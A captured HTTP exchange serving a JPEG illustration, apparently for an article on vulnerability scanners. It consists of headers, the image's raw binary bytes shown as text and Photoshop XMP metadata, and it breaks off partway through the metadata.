          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙÿí.Photoshop 3.08BIMïZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%G+R8BIM%jäÞ캐Lµj`,ë–E¯8BIM:åprintOutputPstSboolInteenumInteClrmprintSixteenBitboolprinterNameTEXTprintProofSetupObjcProof Setup
          proofSetupBltnenumbuiltinProof	proofCMYK8BIM;-printOutputOptionsCptnboolClbrboolRgsMboolCrnCboolCntCboolLblsboolNgtvboolEmlDboolIntrboolBckgObjcRGBCRd  doub@oàGrn doub@oàBl  doub@oàBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@R
          vectorDataboolPgPsenumPgPsPgPCLeftUntF#RltTop UntF#RltScl UntF#Prc@YcropWhenPrintingboolcropRectBottomlongcropRectLeftlong
          cropRectRightlongcropRectToplong8BIMíHH8BIM&?€8BIMò
          ÿÿÿÿÿÿ8BIM
          8BIM8BIMó	8BIM'
          8BIMõH/fflff/ff¡™š2Z5-8BIMøpÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè8BIM8BIM
          8BIM08BIM-)í8BIM@@8BIM8BIM}v°$19-top_5_vulnerability_scanners copy°vnullboundsObjcRct1Top longLeftlongBtomlongvRghtlong°slicesVlLsObjcslicesliceIDlonggroupIDlongoriginenumESliceOrigin
          autoGeneratedTypeenum
          ESliceTypeImg boundsObjcRct1Top longLeftlongBtomlongvRghtlong°urlTEXTnullTEXTMsgeTEXTaltTagTEXTcellTextIsHTMLboolcellTextTEXT	horzAlignenumESliceHorzAligndefault	vertAlignenumESliceVertAligndefaultbgColorTypeenumESliceBGColorTypeNone	topOutsetlong
          leftOutsetlongbottomOutsetlongrightOutsetlong8BIM(?ð8BIM)î8BIMÈ Tà€¬ÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙ8BIM!WAdobe PhotoshopAdobe Photoshop 20208BIMÿá+Yhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)" xmp:CreateDate="2015-08-12T08:40:52-06:00" xmp:MetadataDate="2019-12-03T13:35:22-07:00" xmp:ModifyDate="2019-12-03T13:35:22-07:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" xmpMM:DocumentID="adobe:docid:photoshop:90dc98be-e3c9-bd43-aa6c-4c8d5ec2c480" xmpMM:OriginalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" stEvt:when="2015-08-12T08:40:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:c59fedb7-5aae-dc44-806c-a9ae14d83653" stEvt:when="2015-08-12T10:34:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stRef:documentID="adobe:docid:photoshop:7dbf3126-d713-a744-8bcc-86ce4a28f7ad" stRef:originalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>130277488</rdf:li> <rdf:li>141194698</rdf:li> <rdf:li>145150258</rdf:li> <rdf:li>167191953</rdf:li> <rdf:li>176341593</rdf:li> <rdf:li>178977234</rdf:li> <rdf:li>182272822</rdf:li> <rdf:li>192261204</rdf:li> <rdf:li>193438474</rdf:li> <rdf:li>195689250</rdf:li> <rdf:li>196294602</rdf:li> <rdf:li>228083377</rdf:li> <rdf:li>242265558</rdf:li> <rdf:li>3C195ED08DD181C1E70D74058088D923</rdf:li> <rdf:li>51124270</rdf:li> <rdf:li>55EBD6896B155197C00F14AE15DD5833</rdf:li> <rdf:li>6A0A15811A8FC9AC3A16B564BD642F8C</rdf:li> <rdf:li>73579908</rdf:li> <rdf:li>786951C7142A2AEC38D5A5004E40A752</rdf:li> <rdf:li>85C0BB87BEAE9829B22F9F7DDC288118</rdf:li> <rdf:li>98849039</rdf:li> <rdf:li>A5AC77993D83A50F34AA7C4E8A6D5DC7</rdf:li> <rdf:li>F33669D08BFCBD95F06E1D6DC8085223</rdf:li> <rdf:li>adobe:docid:photoshop:2aadf570-db10-11e5-8cd7-df40e3f5c0ff</rdf:li> <rdf:li>adobe:docid:photoshop:3ad2bde0-36da-11e5-aba8-c6c7ea128f87</rdf:li> <rdf:li>adobe:docid:photoshop:3ae55549-2f11-11e5-8a1e-cca3aa3b1f5b</rdf:li> <rdf:li>adobe:docid:photoshop:46ec2593-3be2-11e5-a44f-893b6bacb806</rdf:li> <rdf:li>adobe:docid:photoshop:59185ead-ccc4-1179-9470-fe1407c09860</rdf:li> <rdf:li>adobe:docid:photoshop:5d4ca717-565e-11e5-83d9-96afab01fb7d</rdf:li> <rdf:li>adobe:docid:photoshop:7e1015e9-5bcf-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:7f36621b-addc-11e7-aea5-b4dbe1565c8e</rdf:li> <rdf:li>adobe:docid:photoshop:9510e559-2cae-11e5-a749-d8deb76636bb</rdf:li> <rdf:li>adobe:docid:photoshop:99221731-5be2-294d-9926-ec33347c3f79</rdf:li> <rdf:li>adobe:docid:photoshop:a1d8d42c-8aec-117a-9ce0-d85f44e8821b</rdf:li> <rdf:li>adobe:docid:photoshop:d04f7fa4-5c13-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:df2f204d-b651-11e5-bb8e-99bbec9e1c45</rdf:li> <rdf:li>adobe:docid:photoshop:f188381e-5d62-11e5-a1c8-dc3a58737c37</rdf:li> <rdf:li>uuid:2CDD2D0EC944DF11BBB8F27D9F6841CA</rdf:li> <rdf:li>uuid:D670922B660CE611ADAB93AF422C66D6</rdf:li> <rdf:li>xmp.did:0093BA7511206811B1DAAEADD64F896A</rdf:li> <rdf:li>xmp.did:018011740720681180E5B75AA0F739E5</rdf:li> <rdf:li>xmp.did:0180117407206811871F80FDF2C3718E</rdf:li> <rdf:li>xmp.did:0180117407206811871FB6C01BE9F510</rdf:li> <rdf:li>xmp.did:0180117407206811871FBEC38D9105D7</rdf:li> <rdf:li>xmp.did:0180117407206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:0180117407206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:018011740720681188C683EA16CE491B</rdf:li> <rdf:li>xmp.did:018011740720681188C68D0E9FB08CA5</rdf:li> <rdf:li>xmp.did:018011740720681188C6C87AF92C64EF</rdf:li> <rdf:li>xmp.did:018011740720681192B0CDEAE74D693B</rdf:li> <rdf:li>xmp.did:028011740720681188C6AF0A6F7FE824</rdf:li> <rdf:li>xmp.did:028011740720681188C6C6A97910AC78</rdf:li> <rdf:li>xmp.did:0380117407206811871FB2718E5E8603</rdf:li> <rdf:li>xmp.did:03801174072068119109CACE15827097</rdf:li> <rdf:li>xmp.did:038011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:0480117407206811822AFC40E69A57D6</rdf:li> <rdf:li>xmp.did:04801174072068118C148D3FFC44F7CF</rdf:li> <rdf:li>xmp.did:0580117407206811871FF2DFC48F728E</rdf:li> <rdf:li>xmp.did:05801174072068118A6DDFE128CA40E1</rdf:li> <rdf:li>xmp.did:05801174072068118A6DF5A37A7EB4B7</rdf:li> <rdf:li>xmp.did:0680117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0680117407206811871FD9ADEBC05AC9</rdf:li> <rdf:li>xmp.did:0680117407206811BAA9C90DDE484AC6</rdf:li> <rdf:li>xmp.did:078011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:08801174072068118C14A81E3999D0D0</rdf:li> <rdf:li>xmp.did:0881930D1920681188C6B23E0DA3D9CA</rdf:li> <rdf:li>xmp.did:098011740720681188C6A094D1E6A3F9</rdf:li> <rdf:li>xmp.did:0A80117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0A80117407206811871FD969D92FB0E5</rdf:li> <rdf:li>xmp.did:0A8011740720681188C6D7A592EC9D69</rdf:li> <rdf:li>xmp.did:0A8011740720681192B0EAE56F792B85</rdf:li> <rdf:li>xmp.did:0e6875b8-543f-734c-9035-4a17948bcd0b</rdf:li> <rdf:li>xmp.did:131A06DA1020681188C69193806B1932</rdf:li> 